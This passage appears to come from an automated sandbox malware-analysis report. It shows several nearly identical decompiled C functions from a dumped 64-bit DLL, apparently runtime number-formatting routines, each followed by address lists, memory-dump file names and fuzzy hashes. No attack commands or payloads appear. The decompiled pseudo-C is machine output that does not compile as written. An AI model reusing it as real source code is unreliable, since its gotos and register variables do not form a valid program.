                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001dd02;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001dc8a;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001db97;
                                                                      				goto 0x8001db97;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E000000011800167C4(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001dcb2;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001dccc;
                                                                      				E00000001180021C40(_t134, _t150);
                                                                      				goto 0x8001dcd3;
                                                                      				E000000011800206A0( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t150, _t159);
                                                                      				if (0 == 0) goto 0x8001dd00;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001dcf1;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001dd00;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}















                                                                      0x18001db2c
                                                                      0x18001db2c
                                                                      0x18001db31
                                                                      0x18001db36
                                                                      0x18001db40
                                                                      0x18001db43
                                                                      0x18001db46
                                                                      0x18001db49
                                                                      0x18001db4c
                                                                      0x18001db52
                                                                      0x18001db54
                                                                      0x18001db56
                                                                      0x18001db5f
                                                                      0x18001db68
                                                                      0x18001db6d
                                                                      0x18001db76
                                                                      0x18001db7c
                                                                      0x18001db84
                                                                      0x18001db9e
                                                                      0x18001dba3
                                                                      0x18001dbab
                                                                      0x18001dbb2
                                                                      0x18001dbb8
                                                                      0x18001dbbf
                                                                      0x18001dbcc
                                                                      0x18001dbdc
                                                                      0x18001dbe3
                                                                      0x18001dbe9
                                                                      0x18001dbf3
                                                                      0x18001dbfd
                                                                      0x18001dc04
                                                                      0x18001dc0b
                                                                      0x18001dc11
                                                                      0x18001dc16
                                                                      0x18001dc1f
                                                                      0x18001dc28
                                                                      0x18001dc2e
                                                                      0x18001dc33
                                                                      0x18001dc37
                                                                      0x18001dc3a
                                                                      0x18001dc41
                                                                      0x18001dc45
                                                                      0x18001dc50
                                                                      0x18001dc55
                                                                      0x18001dc5b
                                                                      0x18001dc62
                                                                      0x18001dc6f
                                                                      0x18001dc7f
                                                                      0x18001dc81
                                                                      0x18001dc85
                                                                      0x18001dc8d
                                                                      0x18001dc9d
                                                                      0x18001dca4
                                                                      0x18001dcac
                                                                      0x18001dcae
                                                                      0x18001dcb2
                                                                      0x18001dcb6
                                                                      0x18001dcc0
                                                                      0x18001dcc5
                                                                      0x18001dcca
                                                                      0x18001dcce
                                                                      0x18001dcdb
                                                                      0x18001dce6
                                                                      0x18001dcef
                                                                      0x18001dcf1
                                                                      0x18001dcfa
                                                                      0x18001dcfd
                                                                      0x18001dd16

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 98145baa23a7a125f67c417eb4ccb518aad2bf7cc5c0b3425c9321b31e9a3cd9
                                                                      • Instruction ID: 8933824a77b383372ddc12c4cf12746ed5e5a6fddee4e329ea780e3a0a1fa64f
                                                                      • Opcode Fuzzy Hash: 98145baa23a7a125f67c417eb4ccb518aad2bf7cc5c0b3425c9321b31e9a3cd9
                                                                      • Instruction Fuzzy Hash: 10518177614E5CC3E7AA8F28C0943AC27A0E359BA8F15821AEF46177D9CF21DE45C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E0000000118001DD18(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t159;
                                                                      
                                                                      				_t159 = __r10;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001ddff;
                                                                      				if (_t111 == 0) goto 0x8001dd68;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001de53;
                                                                      				if (_t112 == 0) goto 0x8001ddd7;
                                                                      				if (_t112 == 0) goto 0x8001ddb0;
                                                                      				if (_t112 == 0) goto 0x8001de53;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001de1f;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001dd9a;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001dd9a;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001de7e;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001de95;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001ddd1;
                                                                      				goto 0x8001dd83;
                                                                      				goto 0x8001dd83;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001ddf9;
                                                                      				goto 0x8001dd83;
                                                                      				goto 0x8001dd83;
                                                                      				if (_t119 == 0) goto 0x8001dd68;
                                                                      				if (_t119 == 0) goto 0x8001dd68;
                                                                      				if (_t119 == 0) goto 0x8001dd68;
                                                                      				goto 0x8001dd56;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001deee;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001de76;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001dd83;
                                                                      				goto 0x8001dd83;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E000000011800167C4(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001de9e;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001deb8;
                                                                      				E00000001180021D00(_t134, _t150);
                                                                      				goto 0x8001debf;
                                                                      				E00000001180020758( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t150, _t159);
                                                                      				if (0 == 0) goto 0x8001deec;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001dedd;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001deec;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}















                                                                      0x18001dd18
                                                                      0x18001dd18
                                                                      0x18001dd1d
                                                                      0x18001dd22
                                                                      0x18001dd2c
                                                                      0x18001dd2f
                                                                      0x18001dd32
                                                                      0x18001dd35
                                                                      0x18001dd38
                                                                      0x18001dd3e
                                                                      0x18001dd40
                                                                      0x18001dd42
                                                                      0x18001dd4b
                                                                      0x18001dd54
                                                                      0x18001dd59
                                                                      0x18001dd62
                                                                      0x18001dd68
                                                                      0x18001dd70
                                                                      0x18001dd8a
                                                                      0x18001dd8f
                                                                      0x18001dd97
                                                                      0x18001dd9e
                                                                      0x18001dda4
                                                                      0x18001ddab
                                                                      0x18001ddb8
                                                                      0x18001ddc8
                                                                      0x18001ddcf
                                                                      0x18001ddd5
                                                                      0x18001dddf
                                                                      0x18001dde9
                                                                      0x18001ddf0
                                                                      0x18001ddf7
                                                                      0x18001ddfd
                                                                      0x18001de02
                                                                      0x18001de0b
                                                                      0x18001de14
                                                                      0x18001de1a
                                                                      0x18001de1f
                                                                      0x18001de23
                                                                      0x18001de26
                                                                      0x18001de2d
                                                                      0x18001de31
                                                                      0x18001de3c
                                                                      0x18001de41
                                                                      0x18001de47
                                                                      0x18001de4e
                                                                      0x18001de5b
                                                                      0x18001de6b
                                                                      0x18001de6d
                                                                      0x18001de71
                                                                      0x18001de79
                                                                      0x18001de89
                                                                      0x18001de90
                                                                      0x18001de98
                                                                      0x18001de9a
                                                                      0x18001de9e
                                                                      0x18001dea2
                                                                      0x18001deac
                                                                      0x18001deb1
                                                                      0x18001deb6
                                                                      0x18001deba
                                                                      0x18001dec7
                                                                      0x18001ded2
                                                                      0x18001dedb
                                                                      0x18001dedd
                                                                      0x18001dee6
                                                                      0x18001dee9
                                                                      0x18001df02

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fdbc78b198a59431910ff8152e3a42e4565294aa808e7e441c610a7485a8a53d
                                                                      • Instruction ID: 28f34b4b57393361c6e037e8d9c1530ab65a4ae21e182d1a718e5aeef7ff2d62
                                                                      • Opcode Fuzzy Hash: fdbc78b198a59431910ff8152e3a42e4565294aa808e7e441c610a7485a8a53d
                                                                      • Instruction Fuzzy Hash: 3D51B177604A1C82E7AA9F28D0543AC27A1E759FA9F148106EF095B7D8CF31DE49C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 73%
                                                                      			E0000000118001BF08(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t160;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001bfef;
                                                                      				if (_t111 == 0) goto 0x8001bf58;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001c043;
                                                                      				if (_t112 == 0) goto 0x8001bfc7;
                                                                      				if (_t112 == 0) goto 0x8001bfa0;
                                                                      				if (_t112 == 0) goto 0x8001c043;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001c00f;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001bf8a;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001bf8a;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001c06e;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001c085;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001bfc1;
                                                                      				goto 0x8001bf73;
                                                                      				goto 0x8001bf73;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001bfe9;
                                                                      				goto 0x8001bf73;
                                                                      				goto 0x8001bf73;
                                                                      				if (_t119 == 0) goto 0x8001bf58;
                                                                      				if (_t119 == 0) goto 0x8001bf58;
                                                                      				if (_t119 == 0) goto 0x8001bf58;
                                                                      				goto 0x8001bf46;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001c0de;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001c066;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001bf73;
                                                                      				goto 0x8001bf73;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E000000011800167C4(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001c08e;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001c0a8;
                                                                      				E00000001180021388(0, _t134, _t150, _t160);
                                                                      				goto 0x8001c0af;
                                                                      				E0000000118001FE10( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t160);
                                                                      				if (0 == 0) goto 0x8001c0dc;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001c0cd;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001c0dc;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}















                                                                      0x18001bf08
                                                                      0x18001bf0d
                                                                      0x18001bf12
                                                                      0x18001bf1c
                                                                      0x18001bf1f
                                                                      0x18001bf22
                                                                      0x18001bf25
                                                                      0x18001bf28
                                                                      0x18001bf2e
                                                                      0x18001bf30
                                                                      0x18001bf32
                                                                      0x18001bf3b
                                                                      0x18001bf44
                                                                      0x18001bf49
                                                                      0x18001bf52
                                                                      0x18001bf58
                                                                      0x18001bf60
                                                                      0x18001bf7a
                                                                      0x18001bf7f
                                                                      0x18001bf87
                                                                      0x18001bf8e
                                                                      0x18001bf94
                                                                      0x18001bf9b
                                                                      0x18001bfa8
                                                                      0x18001bfb8
                                                                      0x18001bfbf
                                                                      0x18001bfc5
                                                                      0x18001bfcf
                                                                      0x18001bfd9
                                                                      0x18001bfe0
                                                                      0x18001bfe7
                                                                      0x18001bfed
                                                                      0x18001bff2
                                                                      0x18001bffb
                                                                      0x18001c004
                                                                      0x18001c00a
                                                                      0x18001c00f
                                                                      0x18001c013
                                                                      0x18001c016
                                                                      0x18001c01d
                                                                      0x18001c021
                                                                      0x18001c02c
                                                                      0x18001c031
                                                                      0x18001c037
                                                                      0x18001c03e
                                                                      0x18001c04b
                                                                      0x18001c05b
                                                                      0x18001c05d
                                                                      0x18001c061
                                                                      0x18001c069
                                                                      0x18001c079
                                                                      0x18001c080
                                                                      0x18001c088
                                                                      0x18001c08a
                                                                      0x18001c08e
                                                                      0x18001c092
                                                                      0x18001c09c
                                                                      0x18001c0a1
                                                                      0x18001c0a6
                                                                      0x18001c0aa
                                                                      0x18001c0b7
                                                                      0x18001c0c2
                                                                      0x18001c0cb
                                                                      0x18001c0cd
                                                                      0x18001c0d6
                                                                      0x18001c0d9
                                                                      0x18001c0f2

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: debb3ab282f9c2d68a3654854eb9342973068c50c87671382baf2d22c4096253
                                                                      • Instruction ID: dc689428600a4894c677c8c83a3a2a8345d4fa2a9f90fe825969673c26011ead
                                                                      • Opcode Fuzzy Hash: debb3ab282f9c2d68a3654854eb9342973068c50c87671382baf2d22c4096253
                                                                      • Instruction Fuzzy Hash: FB51C673604A58C2E7AA8F28C4543AC3760E75CB98F158119EF09577D8CF31CE4ACB84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001E320(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001e407;
                                                                      				if (_t110 == 0) goto 0x8001e370;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001e45b;
                                                                      				if (_t111 == 0) goto 0x8001e3df;
                                                                      				if (_t111 == 0) goto 0x8001e3b8;
                                                                      				if (_t111 == 0) goto 0x8001e45b;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001e427;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001e3a2;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001e3a2;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001e486;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001e49d;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e3d9;
                                                                      				goto 0x8001e38b;
                                                                      				goto 0x8001e38b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001e401;
                                                                      				goto 0x8001e38b;
                                                                      				goto 0x8001e38b;
                                                                      				if (_t118 == 0) goto 0x8001e370;
                                                                      				if (_t118 == 0) goto 0x8001e370;
                                                                      				if (_t118 == 0) goto 0x8001e370;
                                                                      				goto 0x8001e35e;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, __r8);
                                                                      				goto 0x8001e4f0;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001e47e;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001e38b;
                                                                      				goto 0x8001e38b;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				E0000000118001671C(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001e4a6;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001e4c0;
                                                                      				E00000001180021F40(_t133, _t149);
                                                                      				goto 0x8001e4c7;
                                                                      				E00000001180020980( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
                                                                      				if (0 == 0) goto 0x8001e4ee;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001e4e0;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001e4ee;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}














                                                                      0x18001e320
                                                                      0x18001e325
                                                                      0x18001e32a
                                                                      0x18001e334
                                                                      0x18001e337
                                                                      0x18001e33a
                                                                      0x18001e33d
                                                                      0x18001e340
                                                                      0x18001e346
                                                                      0x18001e348
                                                                      0x18001e34a
                                                                      0x18001e353
                                                                      0x18001e35c
                                                                      0x18001e361
                                                                      0x18001e36a
                                                                      0x18001e370
                                                                      0x18001e378
                                                                      0x18001e392
                                                                      0x18001e397
                                                                      0x18001e39f
                                                                      0x18001e3a6
                                                                      0x18001e3ac
                                                                      0x18001e3b3
                                                                      0x18001e3c0
                                                                      0x18001e3d0
                                                                      0x18001e3d7
                                                                      0x18001e3dd
                                                                      0x18001e3e7
                                                                      0x18001e3f1
                                                                      0x18001e3f8
                                                                      0x18001e3ff
                                                                      0x18001e405
                                                                      0x18001e40a
                                                                      0x18001e413
                                                                      0x18001e41c
                                                                      0x18001e422
                                                                      0x18001e427
                                                                      0x18001e42b
                                                                      0x18001e42e
                                                                      0x18001e435
                                                                      0x18001e439
                                                                      0x18001e444
                                                                      0x18001e449
                                                                      0x18001e44f
                                                                      0x18001e456
                                                                      0x18001e463
                                                                      0x18001e473
                                                                      0x18001e475
                                                                      0x18001e479
                                                                      0x18001e481
                                                                      0x18001e491
                                                                      0x18001e498
                                                                      0x18001e4a0
                                                                      0x18001e4a2
                                                                      0x18001e4a6
                                                                      0x18001e4aa
                                                                      0x18001e4b4
                                                                      0x18001e4b9
                                                                      0x18001e4be
                                                                      0x18001e4c2
                                                                      0x18001e4cf
                                                                      0x18001e4d5
                                                                      0x18001e4de
                                                                      0x18001e4e0
                                                                      0x18001e4e8
                                                                      0x18001e4eb
                                                                      0x18001e504

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6aacc586db81ae0a0afbd9b7eda649706da637c20b3e7d76e2eb89627b4c3e02
                                                                      • Instruction ID: f0ee276b24ddf4478f207bd2e50bf7fc4ea036e9670c8332aaad749181bbb79e
                                                                      • Opcode Fuzzy Hash: 6aacc586db81ae0a0afbd9b7eda649706da637c20b3e7d76e2eb89627b4c3e02
                                                                      • Instruction Fuzzy Hash: 82519277604E9883E7AA8F28C0583AC37A0E75AB98F148116FF4617799CF35DE49C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
